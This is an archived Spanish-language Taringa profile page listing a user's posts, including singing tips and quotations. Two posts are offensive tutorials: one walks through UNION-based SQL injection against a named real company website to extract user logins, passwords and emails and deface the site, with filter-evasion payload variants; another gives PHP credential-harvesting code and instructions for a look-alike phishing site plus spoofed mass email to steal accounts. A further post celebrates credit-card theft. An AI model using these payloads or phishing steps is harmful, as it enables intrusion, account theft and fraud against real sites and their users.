M

MaximoS2Cannabis

Usuario (Argentina)

Primer post: 6 feb 2011Último post: 9 jun 2011
7
Posts
204
Puntos totales
5
Comentarios
I
Inyeccion SQL, SQLI
InfoporAnónimo3/19/2011

Contenido ¿Que es?. Descripción. ¿En que lenguaje veremos su uso?. Como saber si el sitio es vulnerable. Que hacer si el sitio web es vulnerable. Conclusión. 1.¿Que es? La Inyección SQL o SQLi es una vulnerabilidad centrada en consultas hacia la base de datos de una pagina o servidor, esta vulnerabilidad puede estar en todo tipo de bases de datos como por ejemplo MYSQL, PostgreSQL, ademas de lenguajes de programación de web como ASP, PHP y no se me ocurre nada mas . 2.Descripción Una Inyección SQL o SQLi suele suceder cuando se inyecta una variable de consultas desde una identidad hacia la base de datos y asi obtener directamente información del usuario administrador o ver a tu antojo todas las tablas y columnas de la web. La mayoria de las veces estos errores en las SQL son por la ignorancia del lenguaje pero este código puede ser reparado por cualquier persona, es muy facil arreglar estos errores, les mostrare esas formas al final en la conclusión. 3.¿En que lenguaje veremos su uso? Lo veremos en PHP, ya que es en el lenguaje en que me manejo mas, hasta ahora , Ejemplo de una pagina php: http://www.crdintern...rimir.php?id=12 4.Como saber si el sitio es vulnerable. Se puede saber haciendo consultas a la identidad (ej: id, act, opc) http://www.crdintern...ia.php?idmarca= (NUMERO) http://www.crdintern...mprimir.php?id= (NUMERO) http://www.crdintern...ido.php?idcate= (NUMERO) Algunos de esos podrían tener una vulnerabilidad SQLi para poder saber si tiene una vulnerabilidad habrá que hacer una consulta: http://www.crdintern...rimir.php?id=-1 http://www.crdinternational.com.pe/imprimir.php?id='2 Las paginas normalmente tienen un tipo de “Diccionario” por asi decir, en este diccionario estan las letras usadas para el php, la mayoría de las veces son numeros positivos o letras, si nosotros “insertamos” un numero que no este en este diccionario, podremos obtener errores o deformaciones en la pagina, como por ejemplo: -Numeros Negativos (-1,-2,-3,-4,-5) -Signo ' ('1,'2,'3,'4,'5) Escencialmente se usa la consulta con el signo “ ' “ para saber si tiene el Magic_quotes activado, si lo esta, podremos apreciar errores Ejemplo de error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2' at line 1 Esto nos podra garantizar poder usar el Magic_quotes y asi obtener sus “beneficios”. Si probaste las dos de las muchas consultas que existe, y viste que la página web es vulnerable (te entrega la pagina en blanco, errores como el ejemplo de arriba, deformaciones en la pagina) es porque quizas sea vulnerable, ya hecho estoy mostrare las inyecciones de arriba y su respuesta: http://www.crdintern...rimir.php?id=-1 [img width=800 height=169]http://img37.imagesh...7/3613/sqli.png http://www.crdinternational.com.pe/imprimir.php?id='2 [img width=800 height=78]http://img580.images.../1787/slqi2.png 5.Que hacer si el sitio web es vulnerable. Garantizo que si la web es vulnerable usar la consulta “-1”. Bueno en primer lugar, debemos tener la pagina con la consulta -1: http://www.crdintern...rimir.php?id=-1 Ahora que esta en blanco, usaremos los signos “+” para unir consultas, el comando que llevaremos acabo es el “union select”, que escrito es asi: http://www.crdintern...-1+union+select Este comando une dos consultas [-1(Primera Consulta)+union+select+1(Segunda Consulta)], ahora que tenemos 1 consulta nos falta hacer la segunda la cual sera 1. http://www.crdintern...nion+select+1-- Lo que estamos haciendo ahora es obtener el numero de tablas que hay en la pagina y encontrar la vulnerable, despues del 1 debemos seguir con el numero 2,3,4,5 hasta que en la pagina web te muestre alguno de los numeros que se puso en la consulta, pueden ser de 1 a X numeros, pero la mayoria de las webs son desde 1 a 20, asi que depende de ti seguir del 20 o mas , bueno quedaria así: http://www.crdintern...on+select+1,2-- http://www.crdintern...+select+1,2,3-- http://www.crdintern...elect+1,2,3,4-- http://www.crdintern...ect+1,2,3,4,5-- http://www.crdintern...t+1,2,3,4,5,6-- http://www.crdintern...1,2,3,4,5,6,7-- http://www.crdintern...2,3,4,5,6,7,8-- PD: necesitamos poner el signo “--” despues de la inyección para saltar la sentencia que viene a continuación. Nosotros necesitamos obtener alguno de los numeros puestos en la consulta, como ya los obtuvimos seguiremos avanzando hasta llegar al final , ahora que tenemos la vulnerabilidad, debemos darnos cuenta cuales son los numeros que aparecen en la pagina: en la que estoy probando son los “4,3 y 2” estos numeros podemos remplazarlos por inyecciones para obtener información sobre la web, podemos remplazar el 4 por “version()” o por “user()”, o los comandos que existan , pero esto no nos sirve de nada, solo cabe decir que asi nos podemos divertir curosiando la pagina desde afuera, las inyecciones serian: http://www.crdintern...+1,2,3,version(),5,6,7,8-- http://www.crdintern...ect+1,2,3,user(),5,6,7,8-- o los dos juntos: http://www.crdintern...elect+1,2,user(),version(),5,6,7,8-- Ya sabiendo que reemplazando un numero vulnerable por una inyeccion bien escrita, esta se ejecuta puedo explicarte como podemos obtener las tablas, que son las “categorias” de una pagina web, que en ella podemos obtener cosas como: “comentarios,contenidos,distribuidor,encuestas,enlaces,marca,noticias,producto,respuesta,usuarios” en la cual adentro hay columnas que son la informacion de estas “categorias”, en estas podemos encontrar cosas como: “password,user,id,admin_user,noticia,answer” para obtener las tablas usaremos el comando “group_concat”, “from” y “information_schema.tables” el primero es un tipo de “buscador” en el cual busca lo que tu deses y este en la pagina web, el segundo es para poner la dirección de donde se encuentra el archivo a buscar, y el tercero es una dirección en donde se encuentran las tablas, la inyección de estas en conjunto seria: http://www.crdintern...oncat(identidad a buscar),5,6,7,8+from+information_schema.tables-- donde dice “identidad a buscar”, para buscar las tablas debemos poner “table_name” que especifica que estamos buscando todas las tablas de la pagina web, la inyección seria asi: http://www.crdintern...ncat(table_name),5,6,7,8+from+information_schema.tables-- y obtendriamos muchos nombre que quiza, ni conoscamos y nos podemos confundir, para esto podemos usar este “group_concat” con algunos codigos hexadecimales para poder hacer mas “bonita” la inyección, el codigo es “replace(group_concat(table_name),0x2C,0x3C62723E)“, inyectado quedaria asi: http://www.crdintern...ncat(table_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.tables-- Son muchas mas, mostre algunas para que vean la diferencia de esta inyección con la otra, si te diste cuenta o no, las inyecciones SQLi, perimiten codigos Hexadecimales, ASCII, y nose cuales mas ya que solo he probado esos dos , bueno ahora que tenemos las tablas buscamos una interesante “nosotros buscamos “Defacear” la web asi que buscaremos algo como “admin,users,usuarios” bueno en esta web esta “usuarios”, ahora buscaremos las columnas de Usuarios, asi que aprenderas nuevas inyecciones , estos son el “where” y “table_name=”, con estos dos comandos podemos obtener las columnas de la tabla que queremos (usuarios), para esto la inyección usada para obtener las tablas era: http://www.crdintern...ncat(table_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.tables-- pero ahora queremos buscar columnas asi que cambiaremos “tables” por “columns”, quedaria así: http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns-- Bueno si nos metemos al link, vemos que salen muchos nombres, estos son TODAS las columnas de la web pero nosotros queremos saber unas en especial, que son las de la tabla “Usuarios”, para esto usaremos el comando “where” y “table_name=”, “where” especifica la ruta de una tabla o columna y “table_name=” despues del = se pone el nombre de la tabla en Hexadecimal o si esque esta activado el “magic_quotes”, se pone el nombre entre “ ' “, ejemplo: http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name=0x(USUARIOS EN HEXADECIMAL)-- (ANTES DE CUALQUIER VALOR HEXADECIMAL SE LE DEBE AGREGAR 0x PARA ESPECIFICAR QUE SE VA A AGREGAR UN VALOR HEXADECIMAL A LA INYECCIÓN) Esto quedaria así: http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name=0x7573756172696f73 O si esque esta activado el magic_quotes, podriamos tambien ponerlo así: http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name='usuarios' Pero como no esta activado nos da error, por lo tanto no nos sirve de nada . Ahora que tenemos las columnas de la tabla “Usuarios”, no usaremos ningun nuevo codigo, solo limpiaremos el anterior por: http://www.crdintern..._concat(COLUMNA),0x2C,0x3C62723E),5,6,7,8+from+TABLA Como ven ahí esta una inyección, en Columna, ponemos cosas como: “id,login,password,nivel,email,nombre,apellidos,idusuario” Por ejemplo podemos poner “login,password,email”, asi sacamos un usuario su clave y quizas el msn tenga la misma clave, quien sabe !, la inyección seria asi: http://www.crdintern...,password,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios En todas las inyecciones se le puede añadir hexadecimal asi que le agregaré un = en hexadecimal para separar el user con la password y el mail, quedaria asi: http://www.crdintern...word,0x3d,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios Ya teniendo todo, solo hace falta meterte desde el panel y defacear la web, ahora viene la segunda parte: Segunda parte Como ya sabemos las inyecciones SQL, pueden tener distintas encriptaciones, por ejemplo podemos tener algo como: http://www.crdintern...d6c3e,5,6,7,8-- Se ve algo raro, pero es muy simple, encripte: ######html><body background="http://biocatdefacing.***/bggn3.gif"></body></html> En Hexadecimal y me da el resultado de: 3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e3c2f626f64793e3c2f68746d6c3e, este codigo hexadecimal luego lo inyecto en algun numero vulnerable de la pagina, el resultado es la deformación de la pagina: Como ven se ve muy bonito, pero no nos sirve absolutamente de nada un codigo html como ese, lo que nos puede servir en estos codigos podría ser que la inyección se vea mas ordenada como por ejemplo: http://www.crdintern...9636f3a20,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios-- Aquí puse ######brsUsuario:, ######brsClave: y ######brsPassword:, en Hexadecimal y luego lo añadi a la consulta, cabe decir que en una SQLi pueden haber infinitas consultas, podemos hacer lo del cambio de fondo en el numero vulnerable 3, y luego las columnas de la pagina, quedaria asi: http://www.crdintern...9636f3a20,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios-- No se aprecian las claves pero se ve que si inyecto, para que se vean se les puede cambiar el color de la letra, tambien se puede hacer y es sencillo, solo se usa el codigo en html y se pasa a hexadecimal y luego se ejecuta, no olvide que todo hexadecimal inyectado en la consulta debe tener antes el 0x sino, no funcionaria la Inyección, bueno ahora que saben que el lenguaje encriptado a hexadecimal funciona, les enseñare otra cosa mas: Nosotros sabemos que el comando para unir dos consultas es el UNION+SELECT y puesto en accion era -1+union+select+NUMERO, bueno ahora les mostrare mas: -1+UNION+SELECT+ -1'+UNION+SELECT+ (Magic Quotes Activado) -1+UNION+ALL+SELECT+ -1'+UNION+ALL+SELECT+ -1/**/UNION/**/SELECT/**/ (Se cambia el + por /**/) -1'/**/UNION/**/SELECT/**/ (Magic Quotes Activado) -1/**/UNION/**/ALL/**/SELECT/**/ -1'/**/UNION/**/ALL/**/SELECT/**/ (Magic Quotes Activado) -1/**/UNION/**/ALL/**/SELECT/**/ 1+UNION+SELECT+ 1'+UNION+SELECT+ (Magic Quotes Activado) 1+UNION+ALL+SELECT+ 1'+UNION+ALL+SELECT+ 1/**/UNION/**/SELECT/**/ 1'/**/UNION/**/SELECT/**/ (Magic Quotes Activado) 1/**/UNION/**/ALL/**/SELECT/**/ 1'/**/UNION/**/ALL/**/SELECT/**/ 1/**/UNION/**/ALL/**/SELECT/**/ Puedes probarlos todos, pero el que recomiendo es el -1/**/UNION/**/SELECT/**/, este nunca me ha fallado al igual que el predeterminado, ademas de que existan diferentes tipos de este comando, tambien existen diferentes para el comando +FROM+, algunos de los que se son: +from+ /**/from/**/ %20from%20 +FROM+ /**/FROM/**/ %20FROM%20 Digo lo mismo a lo anterior, pueden probar todos, y recomiendo el /**/from/**/ (Mayus ON/OFF) y el +from+, esto no releva mucho el comando, bueno ahora que sabemos estas dos cosas haré una inyeccion con esto: http://www.crdintern...2,3,4,5,6,7,8-- Y sacando las tablas, podria ser asi: http://www.crdintern...ncat(table_name),5,6,7,8/**/from/**/information_schema.tables-- Al igual que la predeterminada funciona igual, solo que es un poco diferente, bueno ahora al sacar las tablas, quizás alguna vez no les funcione el table_name, pero existe uno que hace lo mismo y es el table_schema, esto va igual a el column_name, existe el mismo, column_schema. Ademas de todo esto, las web como ya sabemos pueden contener codigos hexadecimales, estos se agregan en cualquier consulta pero antes se le debe agregar el 0x para especificar que se usara un codigo hexadecimal. Un ejemplo seria cambiar el fondo de la pagina web, lo cambiare a una imagen mia, el codigo en html seria: ######html><body background="http://biocatdefacing.***/bggn3.gif"> </body></htmls, ahora lo encriptamos a hexadecimal: 3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e Ahora tenemos el codigo, pero les recuerdo que para que se inyecte correctamente debe tener el 0x antes del codigo hexadecimal, quedaria asi: 0x3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e Copio este codigo y lo añado a la consulta, quedaria asi: http://www.crdintern...6223e,5,6,7,8-- Ademas podemos “Ordenar” nuestras Inyecciones, por ejemplo al sacar las columnas de usuarios, y son MUCHOS, podriamos separarlos con hexadecimales, por ejemplo: Usuario: 5573756172696f3a Clave: 436c6176653a Entonces ponemos a la Inyección en la cual sacabamos las columnas de la tabla Usuarios, le añadimos antes de login, 5573756172696f3a y antes de password 436c6176653a, quedaria asi: http://www.crdintern...76653a,password),0x2C,0x3C62723E),5,6,7,8/**/from/**/usuarios-- para arreglar esto, antes de los codigos hexadecimales puestos en la inyección, le agregamos 0x 3c6273e , que significa ######brs, quedaria asi: http://www.crdintern...76653a,password),0x2C,0x3C62723E),5,6,7,8/**/from/**/usuarios-- Ahora se ve mejor, ademas de esto podemos poner codigos PHP, HTML, JAVASCRIPT, ETC. Bueno ahora les dire lo ultimo en encriptación en SQLi, los numeros 1,2,3,4,5,6,7,8,9,X, pueden tambien ser expresados por “Null”, por ejemplo en la inyección de arriba quedaria asi: http://www.crdintern...76653a,password),0x2C,0x3C62723E),null,null,null, null/**/from/**/usuarios-- Ahora diferenciaremos la inyección normal con la “encriptada” http://www.crdintern...76653a,password),0x2C,0x3C62723E),null,null,null, null/**/from/**/usuarios-- http://www.crdintern...,password,email),5,6,7,8+from+usuarios-- Obvio que la primera esta mucho mas elegante, bueno en la tercera parte explicare lo del mysql.user, nos vemos. Autor: biocat

60
8
B
Borrachos manoseandoce, 2 gay
HumorporAnónimo3/15/2011

https://ugc.kn3.net/s/http://www.youtube.com/v/VdxlWgy1BuU&feature=related link: http://www.youtube.com/watch?v=VdxlWgy1BuU&feature=related

0
0
A
Aprende como afinar tu voz y cantar mejor
ArteporAnónimo6/9/2011

Hola trolleros, porque casi toda Taringa Trollea jajaja.. Aca les dejare algunos tips, consejos sobre como cantar u/o mejorar sus cantos, y tratar de afinar su voz. Para lograr que no se rian de ustedes al cantar jaja.. 1 - Antes que nada, nunca deben trartar de emitar a otros, osea los tipicos que cantan mal, son aquellos que quieren emitar la voz del cantante, de la cancion que estan cantando.. 2 - Evitar afinar demaciado, osea cuando estas cantando, la mayoria de los que desafinan, son aquellos que el canto, o la frace lo alargan mucho. Osea marcan muchos las letras al terminar las fraces.. Ejemplo, "Vamos cheee" Asi deberia ser la afinacion, y otros marcan muchas algunas letras. Ejemplo "Vamos cheeeeeeee" 3 - Respirar por la nariz al cantar, esto ayudara a no quedarte sin aire al estar cantando. Ese aire tienes que mantenerlo en los pulmones haciendo una respiracion mas profunda. 4 - Poner firme o duro el diafragma. Cuando cantes vas a sentir como ese aire va saliendo poco a poco y debes sentirlo en el paladar. 5 - Abre bien la boca y marca mas las letras como o u y a esto te ayudara a que no salgan "gallos". Practica solfeo, si tienes algun teclado ve diciendo nota por nota, imita el sonido de la misma por 4 tiempos y cuando ya te salga cada una de ellas haz variaciones. 6 - Para mejor tu afinacion de voz, es favorable cantar durante el dia. Mientras estes en la pc, te mandas un par de cantitos, cuando estes aburrido. Osea asi mejoraras tu afinacion y te acostumbraras a cantar y a tratar de afinar la voz.. 7 - Siempre antes de cantar toma mucha agua, y cuando empiezes a cantar. Sirve mucho ir afinando tu voz, usando tus oidos. Osea es como ir remarcando las fraces que vas cantando.. Ejemplo, a la medida que vas cantando, la vas escuchando muy detenidamente. Asi evitararas desafinar drasticamente. + Yapa una chica Argentina, si quieren charlar con ella. Manden MP.. Comenta, es un derecho que posees. Expresa lo que pensas...

10
20
C
Como crear un Scam/Fake/Clon web
Hazlo Tu MismoporAnónimo4/8/2011

Holas taringueros, aqui les traigo un tutorial hecho por mi. Y con mi creatividad.. Se trata de como copiar o clonar cualquier pagina web. Osea copiar una web para hacer un scam que los fines serian robar cuenta,usuario,clave a alguien que utilize esa web que clonaste o deseas clonar. PD: Usaremos los siguientes programas. Macromedia Deamweaver 8 para editar/modificar el codigo de fuente. PD2: Filezilla FTP client, es para subir tu scam/clon web , a tu hosting. Todos estos programas estas subido en taringa creo, solo tienen que buscarlos nomas. - Para crear nuestro web scam/fake, necesitaremos tambien un dominio propio. Puede ser gratis o comprado. Siempre usar un dominio que sea medio paresido a la web que queremos clonar, si no. Nuestras victimas se pueden dar cuenta. Ejemplo queremos clonar taringa para robarle el user a alguien, tratemos de conseguir un Dominio como, www.taringas.net Que sea gratis o pago. Como veran solo cambia, la S. De esta forma pasara desapersivido que es una web clon. - Despues necesitaremos un hosting donde alojar nuestra web Scam/Fake. Pueden usar www.zobyhost.com 000webhost.com - Para Vincular tu dominio web, con el hosting que vas a usar para alojar tu web Scam/Faka. Necesitas saber tu dns del dominio que estas usando. Osea tenes que cambiar los dns de tu dominio, por los de zobyhost o 000webhost que son los del hosting en donde vas alojar tu web fake.. Haciendo eso, vincularias tu web con la del hosting en donde alojaras la web scam. 1-) Buscamos la pagina para crear el scam/fake, osea un copia/clon de otra web. Entramos por ejemplo a www.taringa.net... Y le damos Click izquierdo con el mouse y van donde dice Copiar Codigo de Fuente. Les abrira una pagina nueva o una pestaña. 2-) Una vez ya dado el click, te mandara o abrira una pagina. Como un documento donde aparesera el dicho Codigo Fuente. Copiamos todo. 3-) Abrimos Macromedia Deamweaver 8. Esperamos que cargue o se abra. Creo que la primera vez que usas el programa, te pregunta para que queres usarlo. Para Diseñador web y un par de opciones mas. Le damos a la opcion Diseñar Web o Programar HTML. 4 - Una vez ya abierto el Macromedia para editar el codigo, Le damos cllick a Crear Nuevo HTML. Nos abrira como un documento y les aparesera en diseño, lo cambiaremos a Codigo. Bueno ya cambiado a codigo, lo que habiamos copiado de la web que queremos clonar, lo pegamos ahi. 5 - Ahora haremos el comando para guardar las claves,email,usuario del Scam/Fake. Osea el PHP !! Abrimos un documento de texto En ella pegamos el siguiente codigo. <?php $login=$_POST["Login"]; $pass=$_POST["Password"]; $guardar=fopen("el nombre del txt que quieran.txt",a); fwrite($guardar," ".$login." ".$pass); fclose($guardar); echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://el link de la pagina fake'>"; ?> Buscamos y ponemos en el codigo PHP, lo que encontramos en el index.html osea el Codigo Fuente, y buscamos login,password,name,email,clave. Para asosiarlas con nuestro PHP. Por ejemplo siempre casi aparese asi, <INPUT TYPE=text NAME="login-user" otro ejemplo <INPUT TYPE=password name=login-password" Lo que tendriamos que cambiar e editar en nuestro PHP, serian donde dicen "login-user" es el comando para guardad los login osea el usuario. Despues donde dice "login--password" es el comando para guardar la password. Osea la clave. Y lo cambiarmos donde dice ["Login"] en nuestro codigo PHP. Por el de ["login-user"] Despues el ["Password"] de nuestro PHP. Lo cambiariamos a ["login-password"] Asi tendriamos ya hecho nuestro PHP. Que esto haria que se guarden las claves que deseamos.. Pero como les decia que todos los Codigo Fuente no son los mismo. Asi que tendremos que buscar los comando que guardan las claves,user,email. Una vez ya localizado, los login y password de la pagina a clonar. Hacemos lo siguiente.. Lo guardamos con el termino PHP. Por ejemplo Account.php El paso mas faciil abran un documento de texto en blanco. Creamos un documento de texto. Como por ejemplo Claves.txt.... Ojo solo ahi que Crear el documento de texto y ponerle de nombre Clave. No es necesario ponerle Clave.txt.. Haremos esto para que las claves se guarden aqui. Lo guardan con el nombre que pusieron en el documento PHP . 6-) Buscamos en nuestro Codigo Fuente que queremos hacer La pagina Fake/Scam , y buscamos donde diga <Form action=. Aqui les mostrare un ejemplo. <FORM ACTION=document.javascript METHOD=post name=form_main="javascript.form;"> Aqui lo que haremos es cambiar <FORM ACTION=document.javascript por <FORM ACTION=account.php Como veran es el nombre del codigo PHP que acabamos de crear. Osea el Account.php que creamos. Como he dicho, solo ahi que crear nuestro codigo PHP, Buscar <FORM ACTION= del codigo fuente que queremos clonar. Y Cambiarla por el codigo PHP que creamos. Guardamos el codigo html como index.html. 7-) Ya Creamos nuestro codigo PHP para robar u/o obtener las claves deseadas. Tambien modificamos/editamos el Codigo Fuente de la pagina web que queremos hacer el Scam/Fake. Recalcol que solo ahi que editar el <Form ACTION= del Codigo Fuente. Y buscar los password,email,login que debemos poner en nuestro PHP. Despues dejamos como esta el Codigo Fuente, no modificamos nada mas. 8-) Por ultimo, ya creamos todo. Ahora debemos subir todo a nuestro hosting con el FileZilla FTP Client. El Index.html , Account.php , Claves.txt. Si sale todo correcto , y han hecho todo lo que le he dicho. Su Scam tendra excito y podran obtener la Claves que desean. Para comprobar que todo salio bien, entren a su web/SCAM/FAKE. Como por ejemplo TARINGAS.NET y les tendra que apareser el mismo Home, en donde se loguean siempre. Pero ese Home de logueo sera tuyo.. Para ser mas claro, por ejemplo uso el Sendblaster que es un programa para enviar EMAIL masivo. Tengo mi Cuenta paga y te envio un Email a vos. Se me olvidaba, con el sendblaster podes hacerte pasar por otro email e enviarlo con un dominio de email de otro. Buen te mando con el sendblaster un correo a vos diciendo lo siguiente. Email del que lo envio, [email protected] Usas los mismos logos, que taringa o la pagina fake usa para mandar email a sus clientes. Le mandas cualquier chamuyo con el motivo que se debe loguear. Y al final le pasas tu pagina web para que se logue ahi, asi podras obtener su contraseña y user. Eemplo de la queremos enviarle. Aca vamos hacer que aparesca WWW.TARINGA.NET Pero vamos a ocultarle otra url adentro de esa misma, para que lo direccione a otra web. Ejemplo WWW.GOOGLE.COM.AR Ejemplo de la URL oculta de la pagina. http://www.google.com.ar/ Delen click y veran que los redicciona a google.com.ar. Bueno hasta aqui llego mi tutorial, si les gusto agregare como ponerle las imagenes a la web fake/scam para que sea igualita. Porque les aparesera todo, pero sin las imagenes del la pagina clonada. Va si la web que clonaron tiene imagenes. Les aviso, que si quieren hacer un scam deben hacerlo. Por ejemplo entrar para loguiarte en la web. Y ahi copiar el Codigo Fuente para crear el Scam. Osea estariamos copiando solo el diseño y codigo fuente de la web. Que eso seria lo que necesitamos... No todo el codigo fuente completo.. Espero que les aya servido, porque lo hize todo a mano. Saludos !! PD3: Este tutorial esta hecho con fines educativos y no soy responsable del mal uso.

126
0
Reabrieron el post historico del Peluchin "Kaker"
Reabrieron el post historico del Peluchin "Kaker"
TaringaporAnónimo2/23/2011

Holas taringueros, recien acaban de Rehabilitar el post del nacimiento e historia del Peluchin o kaker. Muchos ya saben la historia y otros no. Todo comenzo hace mas de 5 años, cuando mastercard publico un robo de mas de 40 millones de targetas de creditos. La mayoria mastercard, tambien muchas de american express, visa, discovery Donde un usuario. Llamado "Nachaos"W de taringa postea la noticia, y entra el famoso usuario ll2okell2o_llvllaTi que es Matias el Peluchin o kaker de Taringa. La verdadera mascota de Taringa... Que el dice ser un hacker, y que roba y hackea distintas web. Aca les dejo un comentario de el ll2okell2o_llvllaTi dijo Más de 5 años: +225 +234 / -9 .jajajaja yo hacia eso en yahoo cuando jugaba al pool y lo sigo haciendo, pq hago las credit card robadas o truchas y le obo a yahoo y a myleague jajajaja, pero es algo silencioso ya que nadie me encuentra; aguante el hack... llvllatias Ahora mismo esta habilitado el post, y los comentarios. Y me muero por dejar mi huella en ese post... Lastima que soy novato. Link de post:

0
0
F
Frases inteligentes muy buen pensadas !!
Salud BienestarporAnónimo2/6/2011

Hola, taringueros aqui les dejos algunas frases inteligentes, muy bien pensadas y con sentido.. El miedo a sufrir es peor que el propio sufrimiento. No pretendas apagar con fuego un incendio, ni remediar con agua una inundación. Estudia el pasado si quieres pronosticar el futuro. Recordad que la naturaleza nos ha dado dos oídos y una boca, para enseñarno que más vale oir que hablar. Un egoísta es aquel que se empeña en hablarte de sí mismo cuando tu te estas muriendo de ganas de hablarle de ti. La capacidad de atención del hombre es limitada y debe ser constantemente espoleada por la provocación. Cuando la lucha del hombre empieza dentro de sí, ese hombre vale algo. Una sola piedra puede desmoronar un edificio. El cerebro no es un vaso para llenar, sino una lámpara para encender. Lo que sabemos es una gota de agua; lo que ignoramos es el océano. Para investigar la verdad es preciso dudar, en cuanto sea posible, de todas las cosas. El que mucho promete rara vez cumple su palabra. En boca cerrada no entran moscas. Dudo, luego pienso. Pienso, luego existo. El hueco que la obra genial ha producido a nuestro alrededor es un buen lugar para encender nuestra pequeña luz. De allí la inspiración que irradian los genios, la inspiración universal que no sólo nos impulsa a la imitación. Los sabios hablan porque tienen algo que decir, los tontos hablan porque tienen que decir algo. Si el mundo se te opone, debes ponerte del lado del mundo. He sido un hombre afortunado; en la vida nada me ha sido fácil. Antes de iniciar la labor de cambiar el mundo, da tres vueltas por tu propia casa. El signo más evidente de que se ha encontrado la verdad es la paz interior. Para que el sueño, la riqueza y la salud se disfruten de verdad, es necesario interrumpirlos. Una vida feliz consiste en tener tranquilidad de espíritu. Hay algunas cosas que son tan serias que solo podemos bromear con ellas. No hagas a otros aquello que no te gustaría que te hicieran a ti, ni te hagas a ti lo que no le harías a los demás. Lo importante no es lo que hicieron de nosotros, sino lo que nosotros hacemos con eso que hicieron de nosotros La intolerancia puede ser definida aproximadamente como la indignación de los hombres que no tienen opiniones. Aprender sin reflexionar, es malgastar la energía. El hombre cree que desempeña su papel en determinada obra y no sabe que mientras tanto han cambiado el decorado en el escenario sin que lo note y sin darse cuenta se encuentra en medio de una representación completamente distinta. Exígete mucho a ti mismo y espera poco de los demás. Así te ahorrarás disgustos. La experiencia nos sirve para, dando un gran rodeo, hallar un atajo. El tiempo es una cierta parte de la eternidad. Ande yo caliente y ríase la gente. Si cierras la puerta a todos los errores, también la verdad se quedará fuera. La vida es aquello que te va sucediendo mientras te empeñas en hacer otros planes. La evidencia es la más decisiva demostración. Ignorante afirma, el sabio duda y reflexiona. La puerta mejor cerrada es aquella que puede dejarse abierta.

8
0
Riquelme el ganador
Riquelme el ganador
InfoporAnónimo6/1/2011

Jajaja.

0
2
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.